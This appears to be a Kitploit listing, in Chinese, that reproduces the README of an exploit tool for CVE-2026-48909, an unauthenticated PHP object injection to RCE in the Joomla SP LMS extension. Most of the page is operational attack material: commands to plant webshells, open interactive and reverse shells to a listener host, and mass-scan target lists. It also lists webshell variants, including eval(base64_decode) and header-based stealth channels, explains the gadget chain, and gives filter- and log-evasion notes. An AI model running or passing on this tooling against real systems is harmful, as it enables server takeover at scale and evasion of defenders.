Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - 针对 Joomla SP LMS 扩展(版本 <= 4.1.3)的未认证 PHP 对象注入到远程代码执行(RCE)漏洞利用工具。利用 lmsOrders cookie 反序列化,通过 Joomla FormattedtextLogger gadget 链写入 webshell。包含交互式 shell、路径发现和清理功能。仅限授权安全测试使用。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
漏洞分析代码分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试命令与控制学习与教育红队
Payload 开发
实验室与实践
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

CVE-2026-48909 - 针对 Joomla SP LMS 扩展(版本 <= 4.1.3)的未认证 PHP 对象注入到远程代码执行(RCE)漏洞利用工具。利用 lmsOrders cookie 反序列化,通过 Joomla FormattedtextLogger gadget 链写入 webshell。包含交互式 shell、路径发现和清理功能。仅限授权安全测试使用。

查看仓库
2152个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-48909

Joomla SP LMS — 未认证的PHP对象注入→RCE

Python Version CVSS License Platform

CVE-2026-48909 的概念验证评估工具
作者:Sudeepa Wanigarathna

joomla1

[!IMPORTANT] 仅限授权使用。 此工具用于安全研究、教育以及测试您拥有或已获得明确书面许可的系统。未经授权访问计算机系统是违法的。作者对滥用不承担任何责任。


目录

  • 概述
  • 漏洞详情
  • 功能特性
  • 安装
  • 快速开始
  • 使用指南
  • 命令参考
  • Payload 类型
  • 攻击链
  • 输出示例
  • 故障排除
  • 仓库结构
  • 版本历史
  • 免责声明
  • 作者

概述

CVE-2026-48909 是 Joomla SP LMS 扩展中的一个严重的 未认证PHP对象注入 漏洞。此工具实现了完整的攻击链,以便安全专业人员能够在实验室或授权环境中验证其影响。

它涵盖检测、路径发现、payload 投递、交互式后渗透(在允许的情况下)、批量评估以及可选清理。


漏洞详情

属性值
CVE IDCVE-2026-48909
CVSS9.5 (严重)
攻击向量网络 — 未认证
影响远程代码执行
受影响产品Joomla SP LMS
受影响版本1.0.0 – 4.1.3
已修复版本SP LMS 4.1.4+
Gadget 链需要 Joomla < 5.2.2

兼容性矩阵

组件版本RCE
SP LMS< 4.1.4存在漏洞
SP LMS≥ 4.1.4已修复
Joomla< 5.2.2可使用 gadget 链
Joomla≥ 5.2.2gadget 链已修复

功能特性

核心功能

能力描述
未认证利用无需凭证
多种 payload7 种 webshell / 执行变体
交互式 shell部署后提供命令历史会话
路径发现自动探测可写路径
清理测试后移除已部署的 webshell

评估与运维

能力描述
批量扫描多线程目标列表 (1000+)
代理支持HTTP/SOCKS (Burp, ZAP 等)
反连 shell基于监听器的 payload
隐身模式基于头部 / POST 的命令通道
随机化UUID shell 名称, User-Agent 轮换
报告导出为 JSON, HTML 或 CSV
检测辅助Joomla 版本检查, --check-only, --safe-mode

规避说明

  • 尽可能避免 Joomla 的 cmd 过滤器拦截的字符
  • 十六进制编码的 PHP 写入路径,以减少 base64 填充 / 斜杠问题
  • 可配置延迟和轮换的 User-Agent
  • 跨多个注入 / 路径候选的重试逻辑

安装

先决条件

  • Python 3.6+
  • pip
  • 网络可达性至待测目标

设置

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

依赖

requests>=2.31.0
urllib3>=2.0.0

argparse 随 Python 标准库提供,无需通过 pip 安装。


快速开始

仅将 https://target.example 替换为 实验室或授权 的目标。

单个目标 — 发现路径 + 交互式 shell

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

安全检查(不进行利用)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

批量扫描

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

反连 shell(授权实验室)

# 监听器
nc -lvnp 4444

# 利用主机
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

使用指南

路径发现

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

已知可写路径

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

交互式会话

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

一次性命令

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

隐身 payload + 交互模式

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

代理(Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

清理

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

目标列表格式

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

命令参考

目标

参数描述
target单个目标 URL
--targets, -T FILE目标文件(每行一个 URL)
--path PATHwebshell 的绝对服务器路径
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEWebShell 文件名(默认:x.php)

网络

参数描述
--timeout SECONDS请求超时(默认:15)
--insecure跳过 TLS 证书验证
--proxy URL例如 http://127.0.0.1:8080
--random-ua轮换 User-Agent(默认启用)
--delay SECONDS请求之间的延迟

反连 shell

参数描述
--reverse-host HOST监听器主机
--reverse-port PORT监听器端口

模式

参数描述
--interactive, -i部署后交互式 shell
--check-only仅检测漏洞
--safe-mode非破坏性测试
--find-path自动发现可写路径
--cmd COMMAND执行一条命令后退出
--cleanup PATH移除指定路径的 webshell
--cleanup-after利用后清理

批量扫描 / 报告

参数描述
--threads NUM工作线程(默认:10)
--export FILE结果输出路径
--export-format FORMATjson, html, csv(默认:json)

日志

参数描述
--log-file FILE将日志写入文件
--quiet, -q安静模式
--verbose, -v详细输出
--no-banner隐藏横幅

Payload 类型

类型行为典型用途
minimal紧凑的 GET 执行空间受限 / 快速测试
standardGET + POST cmd(默认)一般评估
stealth通过 X-Cmd 头部传递命令减少 URL 日志
base64通过 POST 执行 eval(base64_decode(...))绕过过滤器的实验室环境
fullGET/POST + base64 通道更广泛的控制
reverse回连 shell持久化实验室访问
blindshell替代包含/执行模式受限环境
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type minimal --find-path
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path -i
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type reverse \
  --reverse-host 10.0.0.1 --reverse-port 4444 --find-path

攻击链

flowchart TD
    A["攻击者控制的 lmsOrders cookie"] --> B["cart.php 中的 unserialize()"]
    B --> C["FormattedtextLogger::__destruct()"]
    C --> D["File::write() — 写入 PHP 文件"]
    D --> E["磁盘上的 WebShell"]
    E --> F["远程命令执行"]

技术概述

  1. Sink — components/com_splms/models/cart.php 对 base64 解码后的 lmsOrders cookie 进行反序列化。
  2. Gadget — Joomla\CMS\Log\Logger\FormattedtextLogger::__destruct() 触发文件系统写入。
  3. Payload — PHP 主体以十六进制编码,长度填充以避免被过滤的 base64 字符(/, =, +)。
  4. 执行 — 请求已写入的脚本以执行操作系统命令。

输入过滤器绕过(高层)

Joomla 的 cmd 过滤器可能会去除 /、= 和 +。此工具通过以下方式补偿:

  • 将写入内容编码为十六进制
  • 填充序列化/base64 形式以避免非法字符
  • 迭代候选直到生成过滤器安全的 payload

输出示例

交互式会话

shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell> whoami
www-data

shell> pwd
/var/www/html

shell> exit

JSON 导出(结构)

{
  "timestamp": "2026-07-16T10:30:00.123456",
  "target": "https://lab.example",
  "shell_path": "/tmp/x_abc123def.php",
  "shell_url": "https://lab.example/tmp/x_abc123def.php",
  "shell_type": "standard",
  "vulnerable": true,
  "exploited": true,
  "joomla_version": "4.3.2",
  "detected_paths": [
    "/tmp/x_abc123def.php",
    "/images/x_abc123def.php",
    "/cache/x_abc123def.php"
  ],
  "author": "Sudeepa Wanigarathna",
  "tool_version": "3.0"
}

一次性命令

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

故障排除

下载工具